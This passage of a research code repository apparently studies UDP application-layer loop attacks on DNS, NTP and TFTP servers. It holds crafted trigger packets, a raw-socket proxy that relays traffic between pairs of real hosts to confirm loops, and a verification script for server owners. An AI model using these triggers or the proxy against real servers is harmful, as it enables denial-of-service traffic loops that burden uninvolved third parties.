"27020a0000000000000000007f000001000000000000007c5f8504ad93cd4cd1aad3329ffbb2fea822a2f2fead61ea73" 258 | self.attack_name_to_format["bad2_rsvd"] = HEX 259 | 260 | self.attack_name_to_pkt["bad6_rsvd"] = "270f1a0e0310a0da40130c007f000bb10a00000000000ca0e86a2ee6bf6ce0000a300001b00c000e0e8622e86556a600b0" 261 | self.attack_name_to_format["bad6_rsvd"] = HEX 262 | 263 | self.attack_name_to_pkt["bad4_rsvd"] = "27102034a0130034000340aa0340500105065307090807f263000001b000000b0bb000b000000e8622e8b6556b7e0000b0000000b000000b00e862b2e86b55696000" 264 | self.attack_name_to_format["bad4_rsvd"] = HEX 265 | 266 | class TFTP_Attack_Profile: 267 | def __init__(self): 268 | self.port = 69 # Port corresponding to the protocol. 269 | self.attack_name_to_pkt = {} # Stores the attack packets that can be 270 | # sent to create a loop attack by 271 | # abusing dns protocol implementations. 272 | self.attack_name_to_format = {} # Maps each attack in 273 | # 'attack_name_to_pkt' to the packet's 274 | # format (format options in 275 | # class Attack_Pkt_Format()). 276 | 277 | # ------------------- Good Request -------------------------------- 278 | tftp_payload = TFTP(op=1)/b'fJFJmcl.jieopg'/TFTP_RRQ() 279 | self.attack_name_to_pkt['good_read_req'] = to_hex(tftp_payload) 280 | self.attack_name_to_format['good_read_req'] = HEX 281 | 282 | # ------------------- REQEUST BAD MODE ---------------------------- 283 | request_mode = TFTP_RRQ() 284 | request_mode.mode = b'ajsoei' 285 | tftp_payload = TFTP(op=1)/b'fJFJmcl.jieopg'/request_mode 286 | self.attack_name_to_pkt['bad_mode_read_req'] = to_hex(tftp_payload) 287 | self.attack_name_to_format['bad_mode_read_req'] = HEX 288 | 289 | # ------------------- REQUEST BAD NULL BYTES ---------------------- 290 | 291 | tftp_payload = TFTP(op=1)/b'.'/TFTP_RRQ() 292 | self.attack_name_to_pkt['read_req_dir'] = to_hex(tftp_payload) 293 | self.attack_name_to_format['read_req_dir'] = HEX 294 | 295 | tftp_payload = TFTP(op=1)/TFTP_RRQ() 296 | self.attack_name_to_pkt['read_req_no_filename'] = to_hex(tftp_payload) 297 | self.attack_name_to_format['read_req_no_filename'] = HEX 298 | 299 | 300 | tftp_payload = TFTP(op=1)/b'fJFJmcl.jieopg'/b'\x00'/b'\x00' 301 | self.attack_name_to_pkt['read_req_no_mode'] = to_hex(tftp_payload) 302 | self.attack_name_to_format['read_req_no_mode'] = HEX 303 | 304 | tftp_payload = TFTP(op=1)/b'\x00'/b'\x00' 305 | self.attack_name_to_pkt['read_req_no_file_mode'] = to_hex(tftp_payload) 306 | self.attack_name_to_format['read_req_no_file_mode'] = HEX 307 | 308 | 309 | tftp_payload = TFTP(op=1)/b'fJFJmcl.jieopg'/b'\x00octet' 310 | self.attack_name_to_pkt['read_req_no_end'] = to_hex(tftp_payload) 311 | self.attack_name_to_format['read_req_no_end'] = HEX 312 | 313 | tftp_payload = TFTP(op=1)/b'fJFJm@!cl.jieopg'/b'\x00octet\x00' 314 | self.attack_name_to_pkt['read_req_bad_symbol_fname'] = to_hex(tftp_payload) 315 | self.attack_name_to_format['read_req_bad_symbol_fname'] = HEX 316 | 317 | tftp_payload = TFTP(op=1) 318 | self.attack_name_to_pkt['read_req_no_payload'] = to_hex(tftp_payload) 319 | self.attack_name_to_format['read_req_no_payload'] = HEX 320 | 321 | # ------------------- UNEXPECTED DATA ----------------------------- 322 | 323 | 324 | tftp_payload = TFTP(op=3)/b'\x00\x17\x61\x61' 325 | self.attack_name_to_pkt['data_2_bytes'] = to_hex(tftp_payload) 326 | self.attack_name_to_format['data_2_bytes'] = HEX 327 | 328 | tftp_payload = TFTP(op=3)/b'\x00\x17'/b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' 329 | self.attack_name_to_pkt['data_512_bytes'] = to_hex(tftp_payload) 330 | self.attack_name_to_format['data_512_bytes'] = HEX 331 | 332 | # ------------------ UNEXPECTED ACK ------------------------------- 333 | tftp_payload = TFTP(op=4)/b'\x00\x17' 334 | self.attack_name_to_pkt['ack'] = to_hex(tftp_payload) 335 | self.attack_name_to_format['ack'] = HEX 336 | 337 | tftp_payload = TFTP(op=4) 338 | self.attack_name_to_pkt['ack_no_payload'] = to_hex(tftp_payload) 339 | self.attack_name_to_format['ack_no_payload'] = HEX 340 | 341 | # ------------------ ERROR_MESSAGE -------------------------------- 342 | 343 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=0,errormsg='Not defined') 344 | self.attack_name_to_pkt['err0'] = to_hex(tftp_payload) 345 | self.attack_name_to_format['err0'] = HEX 346 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=1,errormsg='File not found') 347 | self.attack_name_to_pkt['err1'] = to_hex(tftp_payload) 348 | self.attack_name_to_format['err1'] = HEX 349 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=2,errormsg='Access violation') 350 | self.attack_name_to_pkt['err2'] = to_hex(tftp_payload) 351 | self.attack_name_to_format['err2'] = HEX 352 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=3,errormsg='Disk full or allocation exceeded') 353 | self.attack_name_to_pkt['err3'] = to_hex(tftp_payload) 354 | self.attack_name_to_format['err3'] = HEX 355 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=4,errormsg='Illegal TFTP operation') 356 | self.attack_name_to_pkt['err4'] = to_hex(tftp_payload) 357 | self.attack_name_to_format['err4'] = HEX 358 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=5,errormsg='Unknown transfer ID') 359 | self.attack_name_to_pkt['err5'] = to_hex(tftp_payload) 360 | self.attack_name_to_format['err5'] = HEX 361 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=6,errormsg='File already exists') 362 | self.attack_name_to_pkt['err6'] = to_hex(tftp_payload) 363 | self.attack_name_to_format['err6'] = HEX 364 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=7,errormsg='No such user') 365 | self.attack_name_to_pkt['err7'] = to_hex(tftp_payload) 366 | self.attack_name_to_format['err7'] = HEX 367 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=128,errormsg='Test ERROR') 368 | self.attack_name_to_pkt['err8'] = to_hex(tftp_payload) 369 | self.attack_name_to_format['err8'] = HEX 370 | 371 | proto_to_profile = { 372 | "dns" : DNS_Attack_Profile(), 373 | "ntp" : NTP_Attack_Profile(), 374 | "tftp" : TFTP_Attack_Profile(), 375 | "chargen" : Chargen_Attack_Profile(), 376 | "qotd" : Qotd_Attack_Profile(), 377 | "echo" : Echo_Attack_Profile(), 378 | "daytime" : Daytime_Attack_Profile(), 379 | 'auser': Auser_Attack_Profile(), 380 | 'time' : Time_Attack_Profile(), 381 | } 382 | 383 | 384 | ''' 385 | If you want to add a new discovery probe to an existing protocol, e.g., TFTP, you can add the following 386 | lines to class *TFTP_Attack_Profile*. 387 | 388 | self.attack_name_to_pkt[''] = 'a hex string, e.g., 0x0005000500' 389 | self.attack_name_to_format[''] = HEX 390 | 391 | or you can add: 392 | 393 | self.attack_name_to_pkt[''] = 'a string' 394 | self.attack_name_to_format[''] = TEXT 395 | 396 | TEXT and HEX are two probe payload types accepted by Zmap. 397 | 398 | ---------------------------------------------------------------------------------------- 399 | 400 | If you want to probe a new protocol, you can add the following: 401 | 402 | 1. create a new class for the new protocol and add discovery probes. Example: 403 | 404 | class New_Protocol_Attack_Profile: 405 | def __init__(self): 406 | self.port = XX # Port corresponding to the protocol. 407 | self.attack_name_to_pkt = {} 408 | self.attack_name_to_format = {} 409 | 410 | self.attack_name_to_pkt['probe_1'] = 'example_payload_string' 411 | self.attack_name_to_format['probe_1'] = TEXT 412 | 413 | 2. create an instance for the new class in ```proto_to_profile```. Example: 414 | 415 | 416 | proto_to_profile = { 417 | "dns" : DNS_Attack_Profile(), 418 | "ntp" : NTP_Attack_Profile(), 419 | "tftp" : TFTP_Attack_Profile(), 420 | "chargen" : Chargen_Attack_Profile(), 421 | "qotd" : Qotd_Attack_Profile(), 422 | "echo" : Echo_Attack_Profile(), 423 | "daytime" : Daytime_Attack_Profile(), 424 | 'auser': Auser_Attack_Profile(), 425 | 'time' : Time_Attack_Profile(), 426 | 'new_p' : New_Protocol_Attack_Profile(), 427 | } 428 | 429 | ''' -------------------------------------------------------------------------------- /proxy.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from threading import Thread 3 | import sys 4 | import queue 5 | import time 6 | import pickle 7 | from scapy.all import * 8 | import psycopg2 9 | import random 10 | import os 11 | 12 | if len(sys.argv)!=7: 13 | print('python3 proxy.py ') 14 | exit(0) 15 | 16 | local_ip = sys.argv[1] 17 | scan_2nd_table_name = sys.argv[2] 18 | scan_payload_file = sys.argv[3] 19 | cycle_ip_dict_file = sys.argv[4] 20 | start_port = int(sys.argv[5]) 21 | proto_port = int(sys.argv[6]) 22 | 23 | 24 | 25 | 26 | TRUE_POSITIVE_CAP = 25 27 | RATE_LIMIT = 3 28 | SAMPLED_PAIRS_PER_CYCLE = 100 29 | OVER_ALL_TIMEOUT = 300 30 | 31 | 32 | class Host(): 33 | def __init__(self,host_ip,host_port,ratelimit=3): 34 | self.host_ip = host_ip 35 | self.host_port = host_port 36 | self.ratelimit = ratelimit 37 | self.last_sent_time = int(time.time()*10) 38 | self.interval = int((1.0/(ratelimit * 1.0))*10) 39 | def get_addr(self): 40 | return (self.host_ip,self.host_port) 41 | 42 | def get_and_update_next_pac_time(self): 43 | curr_time = int(time.time()*10) 44 | self.last_sent_time = max(curr_time,self.last_sent_time+self.interval) 45 | return self.last_sent_time 46 | 47 | 48 | class Loop_pair(): 49 | def __init__(self, local_ip, local_port, host_A, host_B): 50 | self.host_A = host_A 51 | self.host_B = host_B 52 | 53 | self.host_A_ip,self.host_A_port = host_A.get_addr() 54 | self.host_B_ip,self.host_B_port = host_B.get_addr() 55 | 56 | self.local_ip = local_ip 57 | self.local_port = local_port 58 | 59 | self.prepared_to_A_pac = IP(src=local_ip,dst=self.host_A_ip)/UDP(sport=local_port,dport=self.host_A_port) 60 | self.prepared_to_B_pac = IP(src=local_ip,dst=self.host_B_ip)/UDP(sport=local_port,dport=self.host_B_port) 61 | 62 | self.total_rcv_counter = 0 63 | 64 | def get_peer_pac(self,ip_addr): 65 | if self.host_A_ip==ip_addr: 66 | return (self.prepared_to_B_pac,self.host_B) 67 | elif self.host_B_ip==ip_addr: 68 | return (self.prepared_to_A_pac,self.host_A) 69 | else: 70 | raise Exception() 71 | 72 | def get_host_A_addr(self): 73 | return (self.host_A_ip, self.host_A_port) 74 | 75 | def get_host_B_addr(self): 76 | return (self.host_B_ip, self.host_B_port) 77 | 78 | 79 | 80 | class Proxy_core(): 81 | def __init__(self,local_ip,cycle_ip_dict_file,scan_payload_file,scan_2nd_table_name,timeout,protocol_port,start_port_number): 82 | self.timeout = timeout 83 | self.protocol_port = protocol_port 84 | self.raw_sock = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_UDP) 85 | self.raw_sock.setsockopt(0,socket.IP_HDRINCL,1) 86 | self.raw_sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 52428800) 87 | self.local_ip = local_ip 88 | self.raw_sock.bind((local_ip,0)) 89 | self.port_pair_mapping = {} 90 | self.cycle_pair_mapping = {} 91 | self.ip_hostobj_mapping = {} 92 | self.send_queue = queue.PriorityQueue() 93 | self.input_queue = queue.Queue() 94 | 95 | self.work_scheduler(cycle_ip_dict_file,scan_payload_file,scan_2nd_table_name,start_port_number) 96 | 97 | # ----- threading init ----- 98 | thread1 = Thread(target=self.worker_recv) 99 | thread2 = Thread(target=self.worker_send) 100 | thread4 = Thread(target=self.worker_pac_build) 101 | 102 | thread1.start() 103 | thread2.start() 104 | thread4.start() 105 | # listening started 106 | # next step is to send initial probes so we can cause a loop 107 | for cycle in self.cycle_pair_mapping.keys(): 108 | pair_list,init_payload = self.cycle_pair_mapping[cycle] 109 | for loop_pair in pair_list: 110 | packet = IP(raw(loop_pair.prepared_to_A_pac/init_payload)) 111 | self.raw_sock.sendto(bytes(packet),loop_pair.get_host_A_addr()) 112 | time.sleep(0.05) 113 | 114 | 115 | thread3 = Thread(target=self.progress_check) 116 | thread3.start() 117 | 118 | def work_scheduler(self,cycle_ip_dict_file,scan_payload_file,scan_2nd_table_name,start_port_number): 119 | f = open(scan_payload_file,'rb') 120 | payload_dict = pickle.load(f) 121 | f.close() 122 | 123 | self.most_replied_probe_each_cluster = {} 124 | db_name = "loop_scan" 125 | db_conn = psycopg2.connect(database=db_name, user="scan") 126 | db_conn.autocommit = True 127 | cursor = db_conn.cursor() 128 | # select_command = "SELECT ARRAY_LENGTH(ARRAY_agg(DISTINCT rsp_src_ip),1) as c,attack_name,index FROM %s GROUP BY index,attack_name ORDER BY c DESC;" % scan_2nd_table_name 129 | select_command = "SELECT ARRAY_LENGTH(ARRAY_agg(DISTINCT rsp_src_ip),1),attack_name,index FROM %s GROUP BY index,attack_name ORDER BY attack_name,index DESC;" % scan_2nd_table_name 130 | cursor.execute(select_command) 131 | all_data = cursor.fetchall() 132 | for entry in all_data: 133 | if not entry[1] in self.most_replied_probe_each_cluster: 134 | self.most_replied_probe_each_cluster[entry[1]] = int(entry[2]) 135 | 136 | f = open(cycle_ip_dict_file,'rb') 137 | cycle_ip_dict = pickle.load(f) 138 | f.close() 139 | 140 | # per_cycle_init = {} 141 | # cluster_table = '' 142 | # for cycle in cycle_ip_dict.keys(): 143 | # init_payload_type = cycle[1:-1].split(', ')[0] 144 | # second_payload_type = cycle[1:-1].split(', ')[1] 145 | # select_command = "select ARRAY_LENGTH(ARRAY_agg(DISTINCT rsp_src_ip),1) as c, attack_name, index FROM (select * from %s JOIN %s on rsp_payload=payload WHERE attack_name='%s' and type_id=%s) as t GROUP BY index,attack_name ORDER BY c DESC;" % (scan_2nd_table_name,cluster_table,init_payload_type,second_payload_type) 146 | # cursor.execute(select_command) 147 | # all_data = cursor.fetchall() 148 | # for entry in all_data: 149 | # if not cycle in per_cycle_init: 150 | # per_cycle_init[cycle] = entry[2] 151 | 152 | 153 | 154 | for cycle in cycle_ip_dict.keys(): 155 | self.cycle_pair_mapping[cycle] = [[],''] 156 | host_A_ips = (random.sample(cycle_ip_dict[cycle][0],SAMPLED_PAIRS_PER_CYCLE)) 157 | host_B_ips = (random.sample(cycle_ip_dict[cycle][1],SAMPLED_PAIRS_PER_CYCLE)) 158 | if len(host_A_ips)<100 or len(host_B_ips)<100: 159 | print('cycle ', cycle ,'does not have enough ips for sampling') 160 | 161 | initiate_probe_type = cycle[1:-1].split(',')[0] 162 | payload_to_initiate = payload_dict[initiate_probe_type][self.most_replied_probe_each_cluster[initiate_probe_type]] 163 | # payload_to_initiate = payload_dict[initiate_probe_type][int(per_cycle_init[cycle])] 164 | 165 | self.cycle_pair_mapping[cycle][1] = bytes.fromhex(payload_to_initiate) 166 | 167 | for i in range(0,SAMPLED_PAIRS_PER_CYCLE): 168 | if not host_A_ips[i] in self.ip_hostobj_mapping: 169 | self.ip_hostobj_mapping[host_A_ips[i]] = Host(host_A_ips[i],self.protocol_port,ratelimit=RATE_LIMIT) 170 | if not host_B_ips[i] in self.ip_hostobj_mapping: 171 | self.ip_hostobj_mapping[host_B_ips[i]] = Host(host_B_ips[i],self.protocol_port,ratelimit=RATE_LIMIT) 172 | loop_pair_object = Loop_pair(self.local_ip,start_port_number,self.ip_hostobj_mapping[host_A_ips[i]],self.ip_hostobj_mapping[host_B_ips[i]]) 173 | 174 | self.port_pair_mapping[start_port_number] = loop_pair_object 175 | self.cycle_pair_mapping[cycle][0].append(loop_pair_object) 176 | start_port_number = start_port_number + 1 177 | if start_port_number > 65535: 178 | raise Exception('out of ports') 179 | 180 | 181 | def worker_pac_build(self): 182 | while(True): 183 | try: 184 | self.build_queued_pac(self.input_queue.get()) 185 | except: 186 | pass 187 | 188 | def build_queued_pac(self,packet): 189 | try: 190 | proto = int.from_bytes(packet[9:10]) 191 | if proto!=17: 192 | return 193 | src_port = int.from_bytes(packet[20:22]) 194 | dst_port = int.from_bytes(packet[22:24]) 195 | 196 | if src_port!=self.protocol_port: 197 | return 198 | loop_pair = self.port_pair_mapping[dst_port] 199 | except: 200 | return 201 | 202 | 203 | try: 204 | packet_to_sent,target_host = loop_pair.get_peer_pac(socket.inet_ntoa(packet[12:16])) 205 | except: 206 | return 207 | 208 | if loop_pair.total_rcv_counter >= TRUE_POSITIVE_CAP: 209 | return 210 | loop_pair.total_rcv_counter = loop_pair.total_rcv_counter + 1 211 | 212 | 213 | addr_tuple = target_host.get_addr() 214 | pac = IP(raw(packet_to_sent/packet[28:])) 215 | send_time = target_host.get_and_update_next_pac_time() 216 | self.send_queue.put((send_time,(pac,addr_tuple))) 217 | 218 | def worker_recv(self): 219 | while(True): 220 | packet = self.raw_sock.recv(8096) 221 | self.input_queue.put(packet) 222 | 223 | def worker_send(self): 224 | while(True): 225 | try: 226 | send_time = self.send_queue.queue[0][0] 227 | except: 228 | pass 229 | else: 230 | curr_time = int(time.time()*10) 231 | if send_time<=curr_time: 232 | pac,addr_tuple = self.send_queue.get()[1] 233 | try: 234 | self.raw_sock.sendto(bytes(pac),addr_tuple) 235 | except Exception as e: 236 | print(str(e), ' : ', bytes(pac), ' : ', addr_tuple) 237 | 238 | def progress_check(self): 239 | start_time = time.time() 240 | while(True): 241 | time.sleep(30) 242 | curr_time = time.time() 243 | if curr_time-start_time > self.timeout: 244 | f = open('udp_proxy_result.log','w') 245 | for key in self.cycle_pair_mapping.keys(): 246 | f.write(str(key).strip() + '\n') 247 | for pair in self.cycle_pair_mapping[key][0]: 248 | line = str(pair.get_host_A_addr()) + ' : ' + str(pair.get_host_B_addr()) + ':' + str(pair.total_rcv_counter) + '\n' 249 | f.write(line) 250 | pair.total_rcv_counter = TRUE_POSITIVE_CAP + 1 251 | f.close() 252 | print('-----End-----') 253 | os._exit(0) 254 | else: 255 | lines = [] 256 | for key in self.cycle_pair_mapping.keys(): 257 | temp_counter = 0 258 | for pair in self.cycle_pair_mapping[key][0]: 259 | if pair.total_rcv_counter >= TRUE_POSITIVE_CAP: 260 | temp_counter = temp_counter + 1 261 | line = str(key).strip() + ' : ' + str(temp_counter) + '/' + str(len(self.cycle_pair_mapping[key][0])) + '\n' 262 | lines.append(line) 263 | 264 | 265 | f = open('progress.log','w') 266 | for line in lines: 267 | f.write(line) 268 | f.write(str(time.time())) 269 | f.close() 270 | 271 | 272 | 273 | proxy = Proxy_core(local_ip,cycle_ip_dict_file,scan_payload_file,scan_2nd_table_name,OVER_ALL_TIMEOUT,proto_port,start_port) 274 | -------------------------------------------------------------------------------- /sample_loop_probe_payloads.py: -------------------------------------------------------------------------------- 1 | import psycopg2 2 | import pickle 3 | import random 4 | import sys 5 | 6 | db_name = "loop_scan" 7 | db_conn = psycopg2.connect(database=db_name, user="scan") 8 | db_conn.autocommit = True 9 | cursor = db_conn.cursor() 10 | 11 | if len(sys.argv)!=5: 12 | print('python3 sample_loop_probe_payloads.py ') 13 | exit(-1) 14 | 15 | proto = sys.argv[1].lower() 16 | discovery_table = sys.argv[2] 17 | cluster_table = sys.argv[3] 18 | responder_amount = int(sys.argv[4]) 19 | 20 | 21 | 22 | select_command = "SELECT type_id,IPs FROM (SELECT type_id, (ARRAY_AGG(DISTINCT rsp_payload)) AS IPs, COUNT(DISTINCT rs\ 23 | p_src_ip) AS IP_count FROM (SELECT * FROM %s JOIN %s on rsp\ 24 | _payload=payload) AS temp GROUP BY type_id ORDER BY IP_count DESC) AS temp2 WHERE IP_count>%d;" % (discovery_table, cluster_table,responder_amount) 25 | 26 | cursor.execute(select_command) 27 | all_data = cursor.fetchall() 28 | 29 | 30 | output_dict = {} 31 | 32 | 33 | f_name = '%s_payload.pkl' % proto 34 | f=open(f_name,'wb') 35 | for item in all_data: 36 | all_payload_in_cluster = list(item[1]) 37 | if len(all_payload_in_cluster)<=5: 38 | output_dict[str(item[0])] = list(item[1]) 39 | else: 40 | output_dict[str(item[0])] = random.sample(all_payload_in_cluster,5) 41 | 42 | 43 | pickle.dump(output_dict,f) 44 | f.close() 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /tftp_clustering.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import psycopg2 3 | import pickle 4 | import psycopg2.extras 5 | import pathvalidate 6 | 7 | 8 | def TFTP_classifier(payload): 9 | status_code = '' 10 | status_bit = '' 11 | 12 | payload_hex_len = len(payload) 13 | 14 | if payload_hex_len<4: 15 | status_code = 'os' 16 | return status_code 17 | 18 | if payload_hex_len%2 !=0: 19 | status_code = 'hf' 20 | 21 | opcode = payload[0:4] 22 | payload = payload[4:] 23 | 24 | if opcode == '0001' or opcode=='0002': 25 | if opcode =='0001': 26 | status_bit = 'rr' 27 | else: 28 | status_bit = 'wr' 29 | 30 | first_null_byte = payload.index('00') 31 | if first_null_byte == -1: 32 | status_bit = status_bit + 'nf' +'nm' + 'nn' 33 | status_code = status_code + status_bit 34 | return status_code 35 | 36 | filename = payload[4:first_null_byte] 37 | try: 38 | filename = bytes.fromhex(filename).decode() 39 | filename_len = len(filename) 40 | if len(filename)<32: 41 | status_bit = status_bit + '32' 42 | elif len(filename)<256: 43 | status_bit = status_bit + '256' 44 | else: 45 | status_bit = status_bit + 'ffff' 46 | 47 | if pathvalidate.is_valid_filename(filename,platform='Linux'): 48 | status_bit = status_bit + 'vflin' 49 | else: 50 | status_bit = status_bit + 'iflin' 51 | 52 | if pathvalidate.is_valid_filename(filename,platform='Windows'): 53 | status_bit = status_bit + 'vfwin' 54 | else: 55 | status_bit = status_bit + 'ifwin' 56 | 57 | if pathvalidate.is_valid_filename(filename,platform='macOS'): 58 | status_bit = status_bit + 'vfmac' 59 | else: 60 | status_bit = status_bit + 'ifmac' 61 | 62 | if pathvalidate.is_valid_filename(filename,platform='POSIX'): 63 | status_bit = status_bit + 'vfpos' 64 | else: 65 | status_bit = status_bit + 'ifpos' 66 | except: 67 | status_bit = status_bit + 'bf' 68 | 69 | # ----- mode -------- 70 | 71 | payload = payload[first_null_byte+2:] 72 | second_null_byte = payload.index('00') 73 | if second_null_byte == -1: 74 | status_bit = status_bit +'nm'+'n2n' 75 | status_code = status_code + status_bit 76 | return status_code 77 | 78 | mode = payload[0:second_null_byte] 79 | mode = bytes.fromhex(mode).decode() 80 | status_bit = status_bit + mode 81 | 82 | # ----- rest -------- 83 | 84 | payload = payload[second_null_byte+2:] 85 | if len(payload)>0: 86 | status_bit = status_bit + 'extra' 87 | 88 | 89 | status_code = status_code + status_bit 90 | return status_code 91 | 92 | elif opcode == '0003': 93 | status_bit ='dr' 94 | if len(payload)<4: 95 | status_bit = status_bit + 'os' 96 | status_code = status_code + status_bit 97 | return status_code 98 | 99 | block_id = int(payload[0:4],16) 100 | if block_id ==0: 101 | status_bit = status_bit + '0b' 102 | 103 | payload = payload[4:] 104 | if len(payload)<1024: 105 | status_bit = status_bit+'eb' 106 | elif len(payload)==1024: 107 | status_bit = status_bit + 'fb' 108 | elif len(payload)>1024: 109 | status_bit = status_bit + 'ob' 110 | 111 | status_code = status_code + status_bit 112 | return status_code 113 | 114 | elif opcode == '0004': 115 | status_bit = 'ar' 116 | if len(payload)<4: 117 | status_bit = status_bit + 'os' 118 | if len(payload)>4: 119 | status_bit = status_bit + 'extra' 120 | status_code = status_code + status_bit 121 | return status_code 122 | 123 | elif opcode == '0005': 124 | status_bit = 'er' 125 | if len(payload)<4: 126 | status_bit = status_bit + 'os' 127 | status_code = status_code + status_bit 128 | return status_code 129 | 130 | error_code = payload[0:4] 131 | status_bit = status_bit + error_code 132 | payload = payload[4:] 133 | 134 | num_of_null_byte = payload.count('00') 135 | status_bit = status_bit + str(num_of_null_byte) 136 | status_code = status_code + status_bit 137 | return status_code 138 | 139 | else: 140 | status_bit = opcode 141 | if len(payload)<64: 142 | status_bit =status_bit + '64' 143 | elif len(payload) < 256: 144 | status_bit = status_bit + '256' 145 | elif len(payload) <1024: 146 | status_bit = status_bit + '1024' 147 | else: 148 | status_bit = status_bit + 'ffff' 149 | status_code = status_code + status_bit 150 | return status_code 151 | 152 | 153 | 154 | def do_cluster(raw_data_table_name,output_mapping_table_name,cluster_payload_pattern_mapping): 155 | db_name = "loop_scan" 156 | db_conn = psycopg2.connect(database=db_name, user="scan") 157 | db_conn.autocommit = True 158 | cursor = db_conn.cursor() 159 | 160 | sql_get_length = "SELECT COUNT(*) FROM %s;" % (raw_data_table_name) 161 | cursor.execute(sql_get_length) 162 | max_item_count = cursor.fetchall()[0][0] 163 | 164 | 165 | status_dict = {} 166 | total_cluster = 0 167 | try: 168 | dict_file = open(cluster_payload_pattern_mapping,'rb') 169 | status_dict = pickle.load(dict_file) 170 | total_clusters = len(status_dict) 171 | dict_file.close() 172 | except: 173 | pass 174 | 175 | 176 | offset = 0 177 | step_size = 10000 178 | progress_count = 0 179 | 180 | try: 181 | drop_table = "DROP TABLE %s;" % (output_mapping_table_name) 182 | cursor.execute(drop_table) 183 | except: 184 | pass 185 | 186 | create_table = "CREATE TABLE %s (type_id INT,\ 187 | payload TEXT PRIMARY KEY);" % (output_mapping_table_name) 188 | cursor.execute(create_table) 189 | 190 | 191 | insert_command = "INSERT INTO " + output_mapping_table_name + " VALUES %s;" 192 | payload_list = set() 193 | while(True): 194 | if offset > max_item_count: 195 | break 196 | 197 | select_command = "select DISTINCT rsp_payload from %s;" % (raw_data_table_name) 198 | cursor.execute(select_command) 199 | all_data = cursor.fetchall() 200 | 201 | update_list = [] 202 | for data in all_data: 203 | progress_count = progress_count + 1 204 | payload_data = data[0].strip() 205 | total_clusters = len(status_dict.keys()) + 1 206 | status_code = TFTP_classifier(payload_data) 207 | if len(payload_data) > 2500: 208 | continue 209 | if not status_code in status_dict: 210 | status_dict[status_code] = total_clusters 211 | 212 | if not payload_data in payload_list: 213 | update_list.append((status_dict[status_code],payload_data,)) 214 | payload_list.add(payload_data) 215 | 216 | temp = psycopg2.extras.execute_values(cursor,insert_command,update_list) 217 | 218 | 219 | offset = offset + step_size 220 | break 221 | 222 | 223 | with open(cluster_payload_pattern_mapping,'wb') as f: 224 | pickle.dump(status_dict,f) 225 | f.close() 226 | 227 | 228 | import sys 229 | 230 | if len(sys.argv)!=4: 231 | print('python3 tftp_clustering.py ') 232 | exit(-1) 233 | 234 | scan_table_name = sys.argv[1] 235 | cluster_table_name = sys.argv[2] 236 | type_summary_id_mapping_dict = sys.argv[3] 237 | do_cluster(scan_table_name,cluster_table_name,type_summary_id_mapping_dict) 238 | 239 | -------------------------------------------------------------------------------- /verify/README.md: -------------------------------------------------------------------------------- 1 | If you want to check whether your server/software is affected, you can use the provided ```simple_verify.py``` script. 2 | 3 | python3 simple_verify.py 4 | 5 | : dns, ntp, tftp 6 | : ip of the tested server 7 | 8 | 9 | The script will send a series of trigger probes identified in our experiment. Since all these trigger probes are responses/error messages that a server shall not react to, if you observe a response sent by your server, it likely suggets your server is affected. 10 | 11 | Note that, some TFTP software would send a response from a random source port other than 69. If your server doesn't send a TFTP response from source port 69, it is likely not affected. -------------------------------------------------------------------------------- /verify/simple_verify.py: -------------------------------------------------------------------------------- 1 | DNS_triggers = [ 2 | '860c81000001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d00000100010001517f000401020304', 3 | '697481010001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d00000100010000ffa8000401020304', 4 | 'fb8e81020001000000000000076578616d706c6503636f6d0000010001c00c00010001000000950004acd91344', 5 | 'a74581800001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304c00c00010001000000000004ade623c5', 6 | '75a281800001000100010000076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304076578616d706c6503636f6d000002000100015180001401610c69616e612d73657276657273036e657400', 7 | 'a74581800001000100010001076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304076578616d706c6503636f6d000002000100000708001401610c69616e612d73657276657273036e65740001610c69616e612d73657276657273036e6574000001000100000708000401020304' 8 | 